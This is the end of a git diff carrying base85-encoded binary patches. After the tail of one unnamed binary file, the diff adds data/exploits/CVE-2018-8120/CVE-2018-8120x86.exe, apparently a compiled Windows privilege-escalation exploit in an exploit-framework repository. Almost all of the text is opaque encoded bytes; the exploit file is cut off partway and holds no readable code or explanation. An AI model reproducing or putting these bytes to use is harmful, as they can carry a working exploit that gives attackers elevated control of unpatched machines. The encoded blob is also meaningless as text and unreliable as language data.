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 Ke&7FJ{ro35FR#b| literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe b/data/exploits/CVE-2018-8120/CVE-2018-8120x86.exe new file mode 100755 index 0000000000000000000000000000000000000000..4485c7b002938cd2fee589b817e1327417622591 GIT binary patch literal 83456 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 